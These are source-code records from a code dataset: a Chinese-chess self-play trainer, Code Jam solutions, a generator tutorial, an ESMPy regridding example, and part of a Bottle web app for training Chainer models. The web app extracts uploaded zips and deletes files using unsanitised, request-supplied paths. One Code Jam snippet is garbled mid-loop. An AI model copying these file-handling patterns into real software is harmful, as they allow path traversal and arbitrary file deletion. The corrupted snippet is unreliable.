repeat=False)\n\tplt.show()\n","repo_name":"floofnoodlecode/sorting-midi","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16824595771","text":"import os\nimport random\nimport time\n\nimport tensorflow as tf\nimport logging\n\nimport numpy as np\n\nfrom env.game_state import GameState\nfrom agent import resnet, players\nfrom env.cchess_env import create_uci_labels\nfrom lib import cbf\nfrom config import conf\nfrom lib.utils import get_latest_weight_path\n\n\nlogging.basicConfig(level=logging.INFO,\n format=\"[%(asctime)s][%(levelname)s][%(message)s]\",\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n )\nrunning_time = 0\nrunning_step = 0\n\n\ndef count_piece(state_str):\n pieceset = {\n 'A',\n 'B',\n 'C',\n 'K',\n 'N',\n 'P',\n 'R',\n 'a',\n 'b',\n 'c',\n 'k',\n 'n',\n 'p',\n 'r'\n }\n return sum([1 for single_chessman in state_str if single_chessman in pieceset])\n\n\nclass Game(object):\n def __init__(self, white, black, verbose=True):\n self.white = white\n self.black = black\n self.verbose = verbose\n self.gamestate = GameState()\n self.total_time = 0\n self.steps = 0\n \n def play_till_end(self):\n global running_step\n global running_time\n\n winner = 'peace'\n moves = []\n peace_round = 0\n remain_piece = count_piece(self.gamestate.statestr)\n while True:\n start_time = time.time()\n if self.gamestate.move_number % 2 == 0:\n player_name = 'w'\n player = self.white\n opponent_player = self.black\n else:\n player_name = 'b'\n player = self.black\n opponent_player = self.white\n \n move, score = player.make_move(self.gamestate, allow_legacy=True)\n opponent_player.oppoent_make_move(move, allow_legacy=True)\n\n if move is None:\n winner = 'b' if player_name == 'w' else 'w'\n break\n moves.append(move)\n # if self.verbose:\n total_time = time.time() - start_time\n self.total_time += total_time\n self.steps += 1\n running_time += total_time\n running_step += 1\n logging.info('time average {}'.format(round(running_time / running_step, 2)))\n logging.info('move {} {} play {} score {} use {:.2f}s pr {} pid {}'.format(\n self.gamestate.move_number,\n player_name,\n move,\n score if player_name == 'w' else -score,\n total_time,\n peace_round,\n os.getpid())\n )\n game_end, winner_p = self.gamestate.game_end()\n if game_end:\n winner = winner_p\n break\n \n remain_piece_round = count_piece(self.gamestate.statestr)\n if remain_piece_round < remain_piece:\n remain_piece = remain_piece_round\n peace_round = 0\n else:\n peace_round += 1\n if peace_round > conf.SelfPlayConfig.non_cap_draw_round:\n winner = 'peace'\n break\n return winner, moves\n\n\nclass NetworkPlayGame(Game):\n def __init__(self, network_w, network_b, **xargs):\n whiteplayer = players.NetworkPlayer('w', network_w, **xargs)\n blackplayer = players.NetworkPlayer('b', network_b, **xargs)\n super(NetworkPlayGame, self).__init__(whiteplayer, blackplayer)\n\n\nclass ContinousNetworkPlayGames(object):\n def __init__(\n self,\n network_w=None,\n network_b=None,\n white_name='net',\n black_name='net',\n random_switch=True,\n recoard_game=True,\n recoard_dir='data/distributed/',\n play_times=np.inf,\n distributed_dir='data/prepare_weight',\n **xargs\n ):\n self.network_w = network_w\n self.network_b = network_b\n self.white_name = white_name\n self.black_name = black_name\n self.random_switch = random_switch\n self.play_times = play_times\n self.recoard_game = recoard_game\n self.recoard_dir = recoard_dir\n self.xargs = xargs\n # self.distributed_server = distributed_server\n self.distributed_dir = distributed_dir\n \n def begin_of_game(self):\n pass\n \n def end_of_game(self, cbf_name, moves, cbfile, training_dt, epoch):\n pass\n \n def play(self, data_url=None, epoch=0, yundao_new_data_dir=None):\n num = 0\n while num < self.play_times:\n time_one_game_start = time.time()\n num += 1\n self.begin_of_game()\n if self.random_switch and random.random() < 0.5:\n self.network_w, self.network_b = self.network_b, self.network_w\n self.white_name, self.black_name = self.black_name, self.white_name\n \n network_play_game = NetworkPlayGame(self.network_w, self.network_b, **self.xargs)\n winner, moves = network_play_game.play_till_end()\n \n stamp = time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))\n date = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n cbfile = cbf.CBF(\n black=self.black_name,\n red=self.white_name,\n date=date,\n site='北京',\n name='noname',\n datemodify=date,\n redteam=self.white_name,\n blackteam=self.black_name,\n round='第一轮'\n )\n cbfile.receive_moves(moves)\n \n randstamp = random.randint(0, 1000)\n cbffilename = '{}_{}_mcts-mcts_{}-{}_{}.cbf'.format(\n stamp, randstamp, self.white_name, self.black_name, winner)\n cbf_name = os.path.join(self.recoard_dir, cbffilename)\n cbfile.dump(cbf_name)\n\n if data_url:\n output_game_file_path = os.path.join(data_url, cbffilename)\n cbfile.dump(output_game_file_path)\n\n if yundao_new_data_dir:\n import moxing as mox\n mox.file.copy(cbf_name, os.path.join(yundao_new_data_dir, cbffilename))\n\n training_dt = time.time() - time_one_game_start\n self.end_of_game(cbffilename, moves, cbfile, training_dt, epoch)\n\n\nclass DistributedSelfPlayGames(ContinousNetworkPlayGames):\n def __init__(self, gpu_num=0, auto_update=True, **kwargs):\n self.gpu_num = gpu_num\n self.auto_update = auto_update\n self.model_name_in_use = None # for tracking latest weight\n super(DistributedSelfPlayGames, self).__init__(**kwargs)\n\n def begin_of_game(self):\n \"\"\"\n when self playing, init network player using the latest weights\n \"\"\"\n if not self.auto_update:\n return\n\n latest_model_name = get_latest_weight_path()\n model_path = os.path.join(self.distributed_dir, latest_model_name)\n if self.network_w is None or self.network_b is None:\n network = resnet.get_model(\n model_path,\n create_uci_labels(),\n gpu_core=[self.gpu_num],\n filters=conf.TrainingConfig.network_filters,\n num_res_layers=conf.TrainingConfig.network_layers\n )\n self.network_w = network\n self.network_b = network\n self.model_name_in_use = model_path\n else:\n if model_path != self.model_name_in_use:\n (sess, graph), ((X, training), (net_softmax, value_head)) = self.network_w\n with graph.as_default():\n saver = tf.train.Saver(var_list=tf.global_variables())\n saver.restore(sess, model_path)\n self.model_name_in_use = model_path\n\n def end_of_game(self, cbf_name, moves, cbfile, training_dt, epoch):\n trained_games = len(os.listdir(conf.ResourceConfig.distributed_datadir))\n logging.info('------------------epoch {}: trained {} games, this game used {}s'.format(\n epoch,\n trained_games,\n round(training_dt, 6),\n ))\n\n\nclass ValidationGames(ContinousNetworkPlayGames):\n pass\n","repo_name":"liyang619/JiangJun","sub_path":"worker/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23611336771","text":"#!/usr/bin/env python3.1\n\nimport sys\n\ndef calc(rows, cols, data):\n\tboard = convert_data(data)\n\tfound = {}\n\tfor size in reversed(range(1,1+min(rows, cols))):\n\t\tfor r in range(rows-size+1):\n\t\t\tfor c in range(cols-size+1):\n\t\t\t\t#print(board)\n\t\t\t\tif valid([board[r2][c:c+size] for r2 in range(r, r+size)]):\n\t\t\t\t\tif size not in found: found[size]=0\n\t\t\t\t\tfound[size] += 1\n\t\t\t\t\tfor r2 in range(r, r+size):\n\t\t\t\t\t\tboard[r2][c:c+size] = [2]*size\n\treturn format_result(found)\n\ndef valid(board):\n\tfor r in range(len(board)):\n\t\tif 2 in board[r]: return False\n\t\tif r > 0 and board[r][0] == board[r-1][0]: return False\n\t\tfor c in range(1, len(board[r])):\n\t\t\tif board[r][c] == board[r][c-1]: return False\n\treturn True\n\ndef format_result(counts):\n\tc = sorted(counts.items())\n\tc.reverse()\n\tout = str(len(c))\n\tfor size, count in c:\n\t\tout += '\\n%d %d' % (size, count)\n\treturn out\n\nbin = {'0':[0,0,0,0],'1':[0,0,0,1],'2':[0,0,1,0],'3':[0,0,1,1],\n '4':[0,1,0,0],'5':[0,1,0,1],'6':[0,1,1,0],'7':[0,1,1,1],\n '8':[1,0,0,0],'9':[1,0,0,1],'A':[1,0,1,0],'B':[1,0,1,1],\n 'C':[1,1,0,0],'D':[1,1,0,1], 'E':[1,1,1,0], 'F':[1,1,1,1]}\ndef convert_data(data):\n\tboard = []\n\tfor row in data:\n\t\tr = []\n\t\tfor hex in row:\n\t\t\tr += bin[hex]\n\t\tboard.append(r)\n\treturn board\n\ndef getints():\n\treturn [int(x) for x in sys.stdin.readline().strip().split(\" \")]\n\nnumTestCases = getints()[0]\nfor i in range(numTestCases):\n\trows, cols = getints()\n\tdata = [sys.stdin.readline().strip() for i in range(rows)]\n\tresult = calc(rows, cols, data)\n\tprint(\"Case #%d: %s\" % (i+1, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_64/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23541663081","text":"import string\r\nimport sys\r\nimport numpy as np\r\n\r\noutput=[]\r\ndef mainFunc():\r\n f=open(\"A-large.in\",\"r\")\r\n x=f.read()\r\n y=x.split()\r\n T=y[0]; del(y[0]);i=0; outputCount=0\r\n while outputCount0:\r\n outputCount +=1\r\n print (\"Case #%d: IMPOSSIBLE\"%outputCount)\r\n else:\r\n outputCount +=1 \r\n print (\"Case #%d: %d\"%(outputCount,count))\r\n i +=2\r\ndef change(a):\r\n if a==\"+\":\r\n return \"-\"\r\n else:\r\n return \"+\"\r\n\r\nmainFunc()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/1843.py","file_name":"1843.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21145876394","text":"from typing import Generator\n\n# Normally, generators are used in for loops. However, when you\n# simply call a generator, the result is an object of type\n# ‹generator›, which represents the suspended computation. (For\n# future reference, native coroutines declared with ‹async def›\n# behave the same way, just the object type is different.)\n\n# Let's define a generator:\n\ndef gen1() -> Generator[ int, None, None ]:\n print( \"before yield 1\" )\n yield 1\n print( \"before yield 2\" )\n yield 2\n\n# To actually run the computation, you can call ‹__next__()› on the\n# ‹generator› object. Alternatively, you can call ‹next› with\n# generator object as the argument. Once you do that, the execution\n# of the body of ‹gen1› starts, and continues until it hits a yield.\n# At that point, the yielded value becomes the return value of\n# ‹__next__()›, like this:\n\ndef test_gen1() -> None: # demo\n x = gen1()\n print( \"constructed gen1\" )\n assert x.__next__() == 1\n print( \"no longer interested in gen1...\\n\" )\n\n# Since ‹x› is just a normal object, we can abandon it at any time.\n# Nothing forces us to keep calling ‹__next__()› on it. Let's look\n# at ‹send()› now.\n\ndef gen2() -> Generator[ int, int, None ]:\n v = yield 1\n print( \"received\", v )\n yield 2\n print( \"returning from gen2()\" )\n pass # StopIteration is automatically raised here\n\ndef test_gen2() -> None: # demo\n y = gen2()\n assert y.__next__() == 1\n assert y.send( 24 ) == 2 # resumes execution of ‹y›\n print( \"sent 24, got 2 back\" )\n try: y.__next__() # generators do not return\n except StopIteration: print( \"generator done\" )\n\nif __name__ == '__main__':\n test_gen1()\n test_gen2()\n","repo_name":"Zakys98/Python-seminar","sub_path":"04/d1_gen.py","file_name":"d1_gen.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20177328379","text":"# This example demonstrates how to create ESMPy Grid, Mesh and Field objects \n# from file and use them for regridding.\n# The data files can be retrieved from the ESMF data repository by uncommenting the\n# following block of code:\n#\n# import os\n# DD = os.path.join(os.getcwd(), \"examples/data\")\n# if not os.path.isdir(DD):\n# os.makedirs(DD)\n# from ESMF.util.cache_data import cache_data_file\n# cache_data_file(os.path.join(DD, \"so_Omon_GISS-E2.nc\"))\n# cache_data_file(os.path.join(DD, \"mpas_uniform_10242_dual_counterclockwise.nc\"))\n\nimport os\nimport ESMF\n\n# This call enables debug logging\n# ESMF.Manager(debug=True)\n\n# Set up the DATADIR\nDATADIR = os.path.join(os.getcwd(), \"examples/data\")\n\n# Create a global grid from a GRIDSPEC formatted file\ngrid = ESMF.Grid(filename=os.path.join(DATADIR, \"so_Omon_GISS-E2.nc\"),\n filetype=ESMF.FileFormat.GRIDSPEC)\n\n# Create a field on the centers of the grid, with extra dimensions\nsrcfield = ESMF.Field(grid, staggerloc=ESMF.StaggerLoc.CENTER, ndbounds=[33, 2])\n\n# Read the field data from file\nsrcfield.read(filename=os.path.join(DATADIR, \"so_Omon_GISS-E2.nc\"),\n variable=\"so\", timeslice=2)\n\n# Create an ESMF formatted unstructured mesh with clockwise cells removed\nmesh = ESMF.Mesh(filename=os.path.join(DATADIR, \"mpas_uniform_10242_dual_counterclockwise.nc\"),\n filetype=ESMF.FileFormat.ESMFMESH)\n\n# Create a field on the nodes of the mesh\ndstfield = ESMF.Field(mesh, meshloc=ESMF.MeshLoc.NODE, ndbounds=[33, 2])\n\ndstfield.data[:] = 1e20\n\n# compute the weight matrix for regridding\nregrid = ESMF.Regrid(srcfield, dstfield,\n regrid_method=ESMF.RegridMethod.BILINEAR,\n unmapped_action=ESMF.UnmappedAction.IGNORE)\n\n# calculate the regridding from source to destination field\ndstfield = regrid(srcfield, dstfield)\n\nif ESMF.local_pet() == 0:\n print (\"Fields created from file regridded successfully :)\")\n","repo_name":"geoschem/gchp_legacy","sub_path":"ESMF/src/addon/ESMPy/examples/regrid_from_file.py","file_name":"regrid_from_file.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"72134362115","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport os.path\nimport platform\nimport sys\nimport traceback\nimport bottle\nfrom bottle.ext import sqlite\nimport random\nimport re\nimport zipfile\nimport yaml\nimport shutil\nimport cv2\nimport numpy\nimport time\nimport threading\nimport sqlite3\nimport subprocess\nimport chainer\nfrom xml.etree.ElementTree import *\nimport six\nimport six.moves.cPickle as pickle\nfrom datetime import datetime\nfrom json import dumps\nfrom PIL import Image\n\nimport imagenet_inspect\nimport train\n\n\n# initialization\nDEEPSTATION_ROOT = (os.getcwd() + os.sep + __file__).replace('main.py', '')\nf = open(DEEPSTATION_ROOT + os.sep + 'settings.yaml')\nsettings = yaml.load(f)\nf.close()\n\napp = bottle.Bottle()\nplugin = sqlite.Plugin(dbfile=DEEPSTATION_ROOT + os.sep + 'deepstation.db' )\napp.install(plugin)\n\nUPLOADED_IMAGES_DIR = settings['uploaded_images']\nUPLOADED_RAW_FILES_DIR = settings['uploaded_raw_files']\nPREPARED_DATA_DIR = settings['prepared_data']\nTRAINED_DATA_DIR = settings['trained_data']\nTEMP_IMAGE_DIR = settings['inspection_temp_image']\nINSPECTION_RAW_IMAGE = settings['inspection_raw_image']\nNVIDIA_SMI_CMD = settings['nvidia_smi']\n\n# static files\n@app.route('/statics/')\ndef server_static(filepath):\n return bottle.static_file(filepath, DEEPSTATION_ROOT + os.sep + 'statics' + os.sep)\n \n@app.route('/uploaded_images/')\ndef uploaded_files(filepath):\n return bottle.static_file(filepath, UPLOADED_IMAGES_DIR )\n\n@app.route('/inspection/images/')\ndef images_for_inspection(filepath):\n return bottle.static_file(filepath, INSPECTION_RAW_IMAGE)\n\n@app.route('/trained_models/download/')\ndef download_trained_model(filepath):\n filename = filepath.split('/')[-1]\n return bottle.static_file(filepath, TRAINED_DATA_DIR, download=filename, mimetype=\"application/octet-stream\")\n\n# main\n@app.route('/')\ndef index(db):\n models = db.execute('select Model.id, Model.name, Model.epoch, Model.is_trained, Model.created_at, Model.network_name, Model.algorithm, Dataset.name from Model left join Dataset on Model.dataset_id = Dataset.id order by Model.id DESC')\n dataset_cur = db.execute('select id, name, dataset_path from Dataset')\n dataset_rows = dataset_cur.fetchall()\n datasets = []\n for d in dataset_rows:\n datasets.append({\"id\": d[0], \"name\": d[1], \"dataset_path\": d[2], \"thumbnails\": get_files_in_random_order(d[2], 4), \"file_num\": count_files(d[2]), \"category_num\": count_categories(d[2])})\n return bottle.template('index.html', models = models.fetchall(), datasets = datasets, gpu_info = get_gpu_info(), chainer_version = get_chainer_version(), python_version = get_python_version())\n\n@app.route('/inspection/upload', method='POST')\ndef do_upload_for_inspection(db):\n model_id = bottle.request.forms.get('model_id')\n epoch = int(bottle.request.forms.get('epoch'))\n upload = bottle.request.files.get('fileInput')\n name, ext = os.path.splitext(upload.filename)\n if ext not in ('.jpg'):\n return show_error_screen(\"File extension not allowed.\")\n timestamp_str = get_timestamp()\n new_filename = INSPECTION_RAW_IMAGE + os.sep + timestamp_str + upload.filename\n try:\n upload.save(new_filename)\n row_model = db.execute('select prepared_file_path, trained_model_path, network_path, name from Model where id = ?', (model_id,))\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n model_info = row_model.fetchone()\n result = inspect(new_filename, model_info[1] + os.sep + 'model%04d'%epoch, model_info[0], model_info[2])\n return bottle.template('inspection_result.html',image=timestamp_str + upload.filename,results=result, name=model_info[3], epoch=epoch)\n\n@app.route('/dataset/show/')\ndef dataset_show(id, db):\n row = db.execute('select name, dataset_path from Dataset where id = ?', (id,))\n dataset_info = row.fetchone()\n name = dataset_info[0]\n dataset_root_path = dataset_info[1]\n if len(os.listdir(dataset_root_path)) == 1:\n dataset_root_path = dataset_root_path + os.sep + os.listdir(dataset_root_path)[0]\n dataset = []\n for path in find_all_directories(dataset_root_path):\n dataset.append({\"path\": path.replace(UPLOADED_IMAGES_DIR, \"\"), \"file_num\": count_files(path), \"category\": path.split(os.sep)[-1], \"thumbnails\": get_files_in_random_order(path, 4)})\n return bottle.template('dataset_show.html', dataset = dataset, name=name, dataset_id = id)\n\n@app.route('/dataset/show//')\ndef dataset_category_show(id, filepath, db):\n row = db.execute('select name from Dataset where id = ?', (id,))\n dataset_name = row.fetchone()[0]\n images = []\n for path in find_all_files(UPLOADED_IMAGES_DIR + os.sep + filepath):\n images.append(path.replace(UPLOADED_IMAGES_DIR + os.sep, ''))\n return bottle.template('dataset_category_detail.html', name = dataset_name, count = len(images), images = images, category = filepath.split(os.sep)[-1], dataset_id = id, dataset_path = filepath)\n\n@app.route('/dataset/delete/file//', method=\"POST\")\ndef dataset_delete_an_image(id, filepath):\n file_name = bottle.request.forms.get('file_path')\n try:\n os.remove(UPLOADED_IMAGES_DIR + os.sep + file_name)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n return bottle.redirect('/dataset/show/' + id + '/' + filepath)\n\n@app.route('/dataset/delete/category/', method=\"POST\")\ndef dataset_delete_a_category(id):\n category_path = bottle.request.forms.get('category_path')\n try:\n shutil.rmtree(UPLOADED_IMAGES_DIR + os.sep + category_path)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n return bottle.redirect('/dataset/show/' + id)\n\n@app.route('/dataset/upload//', method=\"POST\")\ndef dataset_add_image_to_category(id, filepath):\n upload = bottle.request.files.get('fileInput')\n name, ext = os.path.splitext(upload.filename)\n if ext not in ('.jpg'):\n return show_error_screen('File extension not allowed.')\n new_filename = UPLOADED_IMAGES_DIR + os.sep + filepath + os.sep + get_timestamp() + '_' + upload.filename\n try:\n upload.save(new_filename)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n return bottle.redirect('/dataset/show/' + id + '/' + filepath)\n\n@app.route('/dataset/create/category/', method=\"POST\")\ndef dataset_create_category(id, db):\n category_name = bottle.request.forms.get('category_name')\n result = db.execute('select dataset_path from Dataset where id = ?', (id,))\n dataset_path = result.fetchone()[0]\n if len(os.listdir(dataset_path)) == 1:\n dataset_path = dataset_path + os.sep + os.listdir(dataset_path)[0]\n try:\n os.mkdir(dataset_path + os.sep + category_name)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n bottle.response.content_type = 'application/json'\n return dumps({\"status\": \"ok\"})\n\n@app.route('/dataset/remove/')\ndef dataset_delete(id, db):\n row = db.execute('select dataset_path from Dataset where id = ?', (id,))\n dataset_path = row.fetchone()[0]\n try:\n db.execute('delete from Dataset where id = ?', (id,))\n shutil.rmtree(dataset_path)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n return bottle.redirect('/')\n\n@app.route('/models/show/')\ndef show_model_detail(id, db):\n row_model = db.execute('select id, name, epoch, algorithm, is_trained, network_path, trained_model_path, graph_data_path, dataset_id, created_at, network_name from Model where id = ?', (id,))\n model_info = row_model.fetchone()\n ret = {\n \"id\": model_info[0],\n \"name\": model_info[1],\n \"epoch\": model_info[2],\n \"algorithm\": model_info[3],\n \"is_trained\": model_info[4],\n \"network_path\": model_info[5],\n \"trained_model_path\": model_info[6],\n \"graph_data_path\": model_info[7],\n \"dataset_id\": model_info[8],\n \"created_at\": model_info[9],\n \"network_name\": model_info[10]\n }\n gpu_info = get_gpu_info()\n ret['gpu_num'] = 0 if 'gpus' not in gpu_info else len(gpu_info['gpus'])\n if ret['dataset_id'] is not None:\n row_dataset = db.execute('select name from Dataset where id = ?', (ret['dataset_id'],))\n dataset_info = row_dataset.fetchone()\n if dataset_info:\n ret['dataset_name'] = dataset_info[0]\n else:\n ret['dataset_name'] = '---'\n else:\n ret['dataset_name'] = '---'\n model_txt = open(ret['network_path']).read()\n row_all_datasets = db.execute('select id, name from Dataset')\n all_datasets_info = row_all_datasets.fetchall()\n return bottle.template('models_detail.html', model_info = ret, datasets = all_datasets_info, model_txt=model_txt,gpu_info = get_gpu_info(), chainer_version = get_chainer_version(), python_version = get_python_version())\n\n@app.route('/models/start/train', method=\"POST\")\ndef kick_train_start(db):\n dataset_id = bottle.request.forms.get('dataset_id')\n model_id = bottle.request.forms.get('model_id')\n epoch = bottle.request.forms.get('epoch')\n gpu_num = bottle.request.forms.get('gpu_num')\n row_ds = db.execute('select dataset_path from Dataset where id = ?', (dataset_id,))\n ds_path = row_ds.fetchone()[0]\n prepared_file_path = PREPARED_DATA_DIR + os.sep + get_timestamp()\n bottle.response.content_type = 'application/json'\n try:\n os.mkdir(prepared_file_path)\n db.execute('update Model set prepared_file_path = ?, epoch = ?, is_trained = 1, dataset_id = ? where id = ?', (prepared_file_path, epoch, dataset_id, model_id))\n prepare_for_train(ds_path, prepared_file_path)\n start_train(model_id, epoch, prepared_file_path, gpu_num)\n except:\n db.execute('update Model set is_trained = 0 where id = ?', (model_id,))\n return dumps({\"status\": \"error\", \"traceback\": traceback.format_exc(sys.exc_info()[2])})\n return dumps({\"status\": \"OK\"})\n \n@app.route('/models/download//')\ndef get_trained_model(id, epoch, db):\n row_model = db.execute('select trained_model_path from Model where id = ?', (id,))\n path = row_model.fetchone()[0]\n epoch = int(epoch)\n path = path.replace(TRAINED_DATA_DIR, '')\n return bottle.redirect('/trained_models/download' + path + '/model%04d'%epoch)\n\n@app.route('/models/labels/download/')\ndef get_label_text(id, db):\n row_model = db.execute('select prepared_file_path from Model where id = ?', (id,))\n path = row_model.fetchone()[0]\n return bottle.static_file('labels.txt', path, download='labels.txt', mimetype=\"text/plain\")\n\n@app.route('/models/new')\ndef make_new_model():\n model_templates = os.listdir(DEEPSTATION_ROOT + os.sep + 'model_templates')\n return bottle.template('new_model.html', templates = model_templates)\n \n@app.route('/models/create', method=\"POST\")\ndef create_new_model(db):\n model_name = bottle.request.forms.get('model_name').strip()\n my_network = bottle.request.forms.get('my_network')\n model_template = bottle.request.forms.get('model_template')\n network_type = bottle.request.forms.get('network_type').strip()\n algorithm = None\n \n if not re.match(r\".+\\.py\", model_name):\n model_name += '.py'\n if network_type is None or network_type is '':\n if model_template is not None or model_template is not '':\n network_type = re.sub(r\"\\.py$\", \"\", model_template)\n else:\n network_type = None\n if algorithm is '':\n algorithm = None\n \n network_file_path = DEEPSTATION_ROOT + os.sep + 'models' + os.sep + model_name\n try:\n network_file = open(network_file_path, \"w\")\n network_file.write(my_network)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n finally:\n network_file.close()\n \n t = (model_name, network_file_path, network_type, algorithm)\n try:\n row = db.execute(\"insert into Model(name, network_path, network_name, algorithm) values(?,?,?,?)\", t)\n except:\n return show_error_screen(traceback.format_exc(sys.exc_info()[2]))\n return bottle.redirect('/models/show/' + str(row.lastrowid))\n\n@app.route('/cleanup')\ndef cleanup(db):\n rows = db.execute('select prepared_file_path from Model')\n paths = rows.fetchall()\n for p in paths:\n if p[0] is None: continue\n for f in os.listdir(p[0]):\n if f.split('.')[-1] in ['jpg', 'jpeg', 'gif', 'png']:\n os.remove(p[0] + os.sep + f)\n return bottle.redirect('/')\n\n# API ----------------------------------------------------------\n\n# hundle uploaded file\n@app.route('/api/upload', method='POST')\ndef do_upload(db):\n bottle.response.content_type = 'application/json'\n dataset_name = bottle.request.forms.get('dataset_name')\n upload = bottle.request.files.get('fileInput')\n name, ext = os.path.splitext(upload.filename)\n if ext not in ('.zip'):\n return show_error_screen(\"File extension not allowed.\")\n timestamp_str = get_timestamp()\n new_filename = re.sub(r'\\.zip$', '_' + timestamp_str + '.zip', upload.filename)\n try:\n upload.save(UPLOADED_RAW_FILES_DIR + os.sep + new_filename, overwrite=True)\n zf = zipfile.ZipFile(UPLOADED_RAW_FILES_DIR + os.sep + new_filename, 'r')\n upload_image_dir_root = UPLOADED_IMAGES_DIR + os.sep + timestamp_str\n os.mkdir(upload_image_dir_root)\n db.execute('insert into Dataset(name, dataset_path, updated_at) values(?, ?, current_timestamp)', (dataset_name, upload_image_dir_root))\n for f in zf.namelist():\n temp_file_path = upload_image_dir_root + os.sep + f\n if ('__MACOSX' in f) or ('.DS_Store' in f):\n continue\n if not os.path.basename(f):\n if os.path.exists(temp_file_path):\n continue\n os.mkdir(temp_file_path)\n else:\n if os.path.exists(temp_file_path):\n uzf = file(temp_file_path, 'w+b')\n else:\n uzf = file(temp_file_path, 'wb')\n uzf.write(zf.read(f))\n uzf.close()\n except:\n return dumps({'error': traceback.format_exc(sys.exc_info()[2])})\n finally:\n if 'zf' in locals():\n zf.close()\n if 'uzf' in locals():\n uzf.close()\n return dumps({'status': 'success'})\n\n@app.route('/api/models/get_model_template/')\ndef api_get_model_template(model_name):\n model_template = open(DEEPSTATION_ROOT + os.sep + 'model_templates' + os.sep + model_name).read()\n bottle.response.content_type = 'application/json'\n ret = {'model_template': model_template}\n return dumps(ret)\n \n@app.route('/api/models/get_training_data/')\ndef api_get_training_data(id, db):\n model_row = db.execute('select line_graph_data_path, is_trained from Model where id = ?', (id,))\n model = model_row.fetchone()\n bottle.response.content_type = 'application/json'\n if model[0] is None or not os.path.exists(model[0]):\n return dumps({'status': 'graph not ready', 'is_trained': model[1]})\n f = open(model[0], 'r')\n data = f.read()\n f.close()\n return dumps({'status': 'ready', 'data': data, 'is_trained': model[1]})\n \n@app.route('/api/models/chekc_train_progress')\ndef api_check_train_progress(db):\n model_row = db.execute('select id, is_trained from Model')\n models = model_row.fetchall()\n progress = []\n for m in models:\n progress.append({'id': m[0], 'is_trained': m[1]})\n bottle.response.content_type = 'application/json'\n return dumps({'progress': progress})\n\n#------- private methods ---------\ndef find_all_files(directory):\n for root, dirs, files in os.walk(directory):\n for f in files:\n if f.startswith('__MACOSX') or f.startswith('.DS_Store'):\n continue\n yield os.path.join(root, f)\n\ndef find_all_directories(directory):\n for root, dirs, files in os.walk(directory):\n if len(dirs) == 0:\n yield root\n\ndef make_train_data(target_dir, prepared_data_dir):\n train = open(prepared_data_dir + os.sep + 'train.txt', 'w')\n test = open(prepared_data_dir + os.sep + 'test.txt', 'w')\n labelsTxt = open(prepared_data_dir + os.sep + 'labels.txt', 'w')\n classNo = 0\n count = 0\n for path, dirs, files in os.walk(target_dir):\n if not dirs:\n start = path.rfind(os.sep) + 1\n labelsTxt.write(path[start:].split(os.sep)[0] + \"\\n\")\n startCount = count\n length = len(files)\n for f in files:\n if(f.split('.')[-1] not in [\"jpg\", \"jpeg\", \"gif\", \"png\"]):\n continue\n imagepath = prepared_data_dir + os.sep + \"image%07d\" %count + \".jpg\"\n resize_image(os.path.join(path, f), imagepath)\n if count - startCount < length * 0.75:\n train.write(imagepath + \" %d\\n\" % classNo)\n else:\n test.write(imagepath + \" %d\\n\" % classNo)\n count += 1\n classNo += 1\n train.close()\n test.close()\n labelsTxt.close()\n return\n\ndef resize_image(source, dest):\n name, ext = os.path.splitext(source)\n output_side_length = 256\n img = cv2.imread(source)\n height, width, depth = img.shape\n new_height = output_side_length\n new_width = output_side_length\n if height > width:\n new_height = output_side_length * height / width\n else:\n new_width = output_side_length * width / height\n resized_img = cv2.resize(img, (new_width, new_height))\n height_offset = (new_height - output_side_length) / 2\n width_offset = (new_width - output_side_length) / 2\n cropped_img = resized_img[height_offset:height_offset + output_side_length, width_offset:width_offset + output_side_length]\n cv2.imwrite(dest, cropped_img)\n return\n\ndef compute_mean(prepared_data_dir):\n sum_image = None\n count = 0\n for line in open(prepared_data_dir + os.sep + 'train.txt'):\n filepath = line.strip().split()[0]\n image = numpy.asarray(Image.open(filepath)).transpose(2, 0, 1)\n if sum_image is None:\n sum_image = numpy.ndarray(image.shape, dtype=numpy.float32)\n sum_image[:] = image\n else:\n sum_image += 1\n count += 1\n mean = sum_image / count\n pickle.dump(mean, open(prepared_data_dir + os.sep + 'mean.npy', 'wb'), -1)\n return\n\ndef prepare_for_train(target_dir, prepared_data_dir):\n make_train_data(target_dir, prepared_data_dir)\n compute_mean(prepared_data_dir)\n\ndef start_train(model_id, epoch, prepared_data_dir, gpu):\n if not is_prepared_to_train(prepared_data_dir):\n raise Exception('preparation is not done')\n train_th = threading.Thread(\n target=train.do_train,\n args = (\n DEEPSTATION_ROOT + os.sep + 'deepstation.db',\n prepared_data_dir + os.sep + 'train.txt',\n prepared_data_dir + os.sep + 'test.txt',\n prepared_data_dir + os.sep + 'mean.npy',\n TRAINED_DATA_DIR,\n 'models',\n model_id,\n 32,\n 250,\n int(epoch, 10),\n int(gpu, 10),\n 20\n )\n )\n train_th.start()\n return\n \ndef 